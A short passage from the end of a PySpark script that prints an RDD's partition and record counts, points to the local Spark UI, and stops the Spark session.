print("RDD-3 Partition Count : %i " % (rdd_3.getNumPartitions()))
print("RDD-3 Record Count : %i " % (rdd_3.count()))
commons.print_separator()
print("Details available at http://localhost:4040")
#option = input("Do You Want to Kill Spark Job Process Y/N : ")
#
spark.stop()
| 28 | 0 | 23 |